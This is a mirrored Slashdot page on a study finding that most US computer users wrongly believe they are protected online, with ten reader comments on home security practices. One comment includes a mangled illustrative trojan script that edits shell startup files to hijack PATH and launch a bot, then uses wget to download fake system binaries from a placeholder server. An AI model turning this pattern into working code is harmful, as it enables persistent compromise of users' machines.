Slashdot Mirror

← Back to Stories (view on slashdot.org)

Most In US Have False Sense of Online Security

Posted by kdawson on from the can't-hear-you-la-la-la dept.

BaCa sends along a link from Net-Security on a study of attitudes among Americans about the security of their PCs, versus their actual vulnerability. "More than half of computer users who think they are protected against online threats like spyware, viruses, and hackers actually have inadequate or no online protection, according to an independent research study conducted for Verizon... While 92 percent of participants thought they were safe, the scans revealed that 59 percent were actually vulnerable to a variety of online dangers. Ninety-four percent of those surveyed said they would find it helpful to be able to diagnose or check their online security status on a regular basis to make sure their PCs were safe."

10 of 161 comments (clear)

  1. Online security - HA , Stolen 1949 Chevy Saga by benadamsdotcom · · Score: 3, Interesting

    Even after meeting online criminals in person, they still tried to rip me off. Fortunately, I tracked them down and got them. Stolen and Recovered 1949 Chevy Saga

  2. What am I supposed to do? by maillemaker · · Score: 4, Interesting

    Look, my Windows machines auto-update themselves, and I have AVG running, which also updates itself. I have a firewall downstream of my modem and upstream of every other machine on the network.

    What else can I do?

    My wife is constantly playing and downloading games from the internet. No doubt she is polluting machines on our network.

    Basically my approach to security on my home machines is I wipe them and rebuild them every 6 months or so, in case there is some hidden malware on there that has turned my machine into a zombie.

    What I would really like is a "smart firewall" I could buy and put in place of my current firewall. This device would monitor all network traffic going in and out of my house, and it would stop the bad things from going through. It could even be a service whereby the device is managed by some security firm and I pay them to protect my network through this device.

    --
    A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
  3. Re:Old news by ByOhTek · · Score: 2, Interesting

    Computer security must be taken out of the hands of the user where the user is likely to not have a clue how it works.


    But then you have the problems of

    (a) who do they trust to do it. Part of the reason for this problem is that the user is too trusting, and will download/run anything properly "padded" with the right context. What's to keep them from trusting Joes Bot Shop for their security?

    (b) when they do need something setup/installed quickly, it could be problematic for them to wait for the person/people in charge of security.

    (c) the extra cost if they don't have family/friends who are sufficiently competant and have the time?

    While taking it out of their hands might be a good idea, it might also not be feasable.
    --
    Self proclaimed typo king, and inventor of the bear destroying coffee table (patent not pending).
  4. lulz by thatskinnyguy · · Score: 3, Interesting

    *GASP* I thought AOL was keeping us all safe online!

    --
    The game.
  5. Re:Old news by Bert64 · · Score: 2, Interesting

    Spyware removal is flawed, the focus should be on preventing it getting there in the first place.
    Same with viruses.

    The big problem is that people believe the hype..
    "Windows $version is the most secure windows ever!"
    "$program makes your machine secure"
    Rather than being vigilant, they believe the hype around some product claiming to take away all the security risks.

    End users really need managed workstations, managed by people who know what they're doing.
    Or perhaps kiosk style systems for browsing, booted from non writable media, perhaps with a writable memory card to store your personal settings (with no ability to execute anything on the memory card).

    Someone should do that, create a standard for a bootable CD/DVD, which loads settings from a removable media device (usb stick, memory card etc) but strictly prevents any code being executed (mount the removable device noexec?).

    --
    http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  6. Re:At least once a year... by iminplaya · · Score: 3, Interesting

    False Sense of Security Day

    It would be on the anniversary of the signing of the patriot act.

    So many political jokes to make about this...so little time to post them all

    --
    What?
  7. Re:Old news by ByOhTek · · Score: 1, Interesting

    The problem is, short of a secure list of what can install/run (like application branding, properly implemented), and absolute prohabition of running non-branded applications, nothing can save the users from themselves.

    You have the trade off of "flexibility" and "security".

    As a rough example - if a user downloads and runs this in their system:

    fixed for lameness filter

    START
    bashbang/bin/sh
    STARTUPS EQUALS ".bashrc .cshrc .shrc .login" #add more to be more versatile

    bash create our h4x0red bin dir
    mkdir tilde/.bin

    bash put it in the start of the path on all shells
    for f in $STARTUPS
    do
        if [ "$f" EQUALS ".bashrc" -o "$f" EQUALS ".shrc" -o "$f" EQUALS ".login" ]
        then
            echo "export PATH EQUALS "~/.bin;$PATH" >> $f
            echo "~/.bin/my_custom_bot" >> $f
        #... one for each syntax
        fi
    done

    bash download the fake apps
    FAKES EQUALS "which ls firefox firefox1.5 firefox2.0 opera lynx mail evolution kmail pine elm mutt sh my_custom_bot" bash need more?
    cd ~/.bin
    for prog in $FAKES
    do
        bash clever hackers would put something here to fetch via IRC or FTP, but I'm not good enough
        wget http://some_server/hacked/${uname -s}/${uname -r}/$prog
    done
    STOP

    And now the user has spyware and is part of a botnet. (The bot application would check to see if it is already running, if not, startup and try to fork a daemon, if it cant do that, it'll run in the background.)

    As long as you use a regular system as can be found in UNIX, how can you prevent users from causing problems like that without (a) sacrificing flexibility and interoperability, and/or (b) having a highly skill administrator to keep an eye on them?

    --
    Self proclaimed typo king, and inventor of the bear destroying coffee table (patent not pending).
  8. Re:Old news by Billosaur · · Score: 2, Interesting

    That's my point. Security should be something that is taken out of the hands of the average user. They shouldn't be expected to become security experts. They should be taught how to be a little more web-savvy. I hear a commercial all the time on the radio in NYC for CyberStreetSmart.org, which is run by the New York Public Interest Research Group (NYPIRG), trying to do just that. The commercial is compelling because they say (paraphrasing) "If someone came up to you on the street and said they had a million dollars to give you and all you had to do is give them $1000 to get it, you'd laugh at them, but on-line, most people don't think twice." That's why security has to be built-in rather than added-on: the average user has been sold the idea that the Internet is magic. They don't apply the same rules to information there that they would to things that happen to them directly.

    --
    GetOuttaMySpace - The Anti-Social Network
  9. Re:At least once a year... by secPM_MS · · Score: 2, Interesting
    If you are using your machine as a single user system you are clearly right. The data you care about is in your user account. It is easier to clean up a user-space compromise than an administrator compromise, where you probably have to flatten the system and rebuild.

    I have kids who use my systems. They run under normal accounts (The biggest security advantage of Vista is that normal accounts run well, unlike XP) and hence can mess up their own accounts, but are not so likely to mess up my account.

    User accounts can perform DOS's and network attacks against other systems every bit as easily as administrator accounts, but it is easier for administrative tools to monitor the behavior of user accounts than it is for these tools to monitor the action of things running as system.

  10. Re:At least once a year... by Anonymous Coward · · Score: 1, Interesting

    Viruses on Windows distribute mainly through mail attachments these days. On Linux where you need to save and chmod +x a file the barrier to entry is much higher.
    Viruses on Windows propogate through mail attachments, yes, but not just programs: they propogate through pictures and documents that use exploits in the programs that read them to execute code without any user intervention. Once code is running, it can take advantage of local privilege escalation exploits (or just pop up a gksudo window and trick the user into elevating its privileges through social engineering) and bang, you've been rooted!

    Linux also lacks the braindead design of Windows software with concepts like ActiveX, and documents with executable content (MS Office formats).
    This is just totally not true. ActiveX is conceptually pretty much the same thing as Linux technologies like D-Bus. And there are many types of document commonly used on Linux platforms that can have executable content. (In Emacs, with the right setting enabled, even a plain text document could execute arbitrary code by design. The setting is off by default and carries large warning labels, but it's there.)

    Linux is not a virus target at the moment, but that's not because it's perfectly secure -- it's just because it's more secure, and since Windows is both easier to infect and has more users, it's a much more attractive target. It is likely that even if malware writers turned their full attention to attacking Linux, they would never be so successful against it as they are against Windows... but that doesn't mean they wouldn't have any success at all.